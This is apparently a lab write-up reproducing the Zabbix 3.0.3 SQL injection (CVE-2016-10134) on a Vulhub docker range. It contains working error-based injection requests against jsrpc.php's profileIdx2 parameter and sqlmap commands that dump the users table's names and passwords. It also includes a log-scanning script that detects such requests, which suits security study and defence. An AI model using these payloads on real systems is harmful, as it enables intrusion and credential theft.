[Vulhub range] Zabbix SQL injection (CVE-2016-10134) vulnerability reproduction

2022-06-24 07:29:00 Refused guanxiaotong for many times


Preface

A few days ago, a friend asked me to reproduce this vulnerability. It couldn't be said to have been reproduced: the database could not be read, which is strange. So while I have the time today, I'll just do it and take notes along the way.



I. Vulnerability introduction

What is Zabbix?

Zabbix is server monitoring software made up of server, agent, web and other modules. The web module is written in PHP and is used to display the results stored in the database.

Vulnerability environment

The vulnerability is reproduced on the vulhub range, which starts Zabbix 3.0.3.

II. Reproduction steps

1. Start the vulnerability environment

Enter the zabbix directory, cd into the CVE-2016-10134 directory, and run the following command to start the range:

docker-compose up -d

After the command is executed, it starts the database (MySQL), Zabbix server, Zabbix agent and Zabbix web. If memory is a little small, a container may hang.
Once all services show done, the site can be visited.

After startup, wait a moment, then visit http://your-ip:8080 to reach the Zabbix interface.


2. SQL injection

Zabbix's jsrpc.php page has a SQL injection vulnerability, so the vulnerability is triggered by visiting jsrpc.php. The vulnerable parameter is profileIdx2. Send the following request to execute a SQL statement and get database information.
The request is as follows:

GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0) HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=7689b1e30e63d9726fa86010d3c6592c; PHPSESSID=3r69f0snsemtpmkeiocgg9blj2
Upgrade-Insecure-Requests: 1

The user() function is executed successfully and its result is returned.
Change user() to database() to try to get the database name:

http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,database()),0)


If you are lazy, you can also use the sqlmap tool directly. Everything comes out once it runs, with no experience to speak of:

sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1"

The user names and passwords can also be dumped directly:

sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1" -D zabbix -T users -C name,passwd --dump
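
From the defender's side, the requests shown in this section stand out in web-server access logs. The following is an added example, not part of the original post: it flags jsrpc.php requests whose profileIdx2 is not a plain numeric ID. It assumes combined-style access-log lines and that legitimate profileIdx2 values are numeric, as in the profileIdx2=1 URL above; the function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate profileIdx2 is a plain numeric ID
NUMERIC_ID = re.compile(r"\d{1,20}")


def suspicious_profileidx2(log_line):
    """Return the offending profileIdx2 value, or None if the line is clean."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/jsrpc.php"):
        return None
    # parse_qs percent-decodes, so encoded payloads are checked in clear form
    values = parse_qs(url.query, keep_blank_values=True).get("profileIdx2", [])
    for value in values:
        if not NUMERIC_ID.fullmatch(value):
            return value
    return None


def scan(lines):
    """Yield (client_ip, value) for every flagged access-log line."""
    for line in lines:
        value = suspicious_profileidx2(line)
        if value is not None:
            yield line.split(" ", 1)[0], value


BASE = "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17"
STAMP = "- - [24/Jun/2022:07:29:00 +0000]"
# Constructed sample log lines (not captured from a real system)
SAMPLE_LOG = [
    f'192.0.2.10 {STAMP} "GET {BASE}&profileIdx2=1 HTTP/1.1" 200 512',
    f'192.0.2.44 {STAMP} "GET {BASE}&profileIdx2=updatexml(0,concat(0xa,user()),0) HTTP/1.1" 200 1893',
    f'192.0.2.44 {STAMP} "GET {BASE}&profileIdx2=updatexml%280%2Cconcat%280xa%2Cdatabase%28%29%29%2C0%29 HTTP/1.1" 200 1893',
    f'192.0.2.10 {STAMP} "GET /index.php HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} profileIdx2={value!r}")
```

The same numeric-only check can be applied at a reverse proxy or WAF in front of the Zabbix web interface until the installation is upgraded.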



Summary

This is an ordinary injection reproduction. There is no bypass and no difficulty.
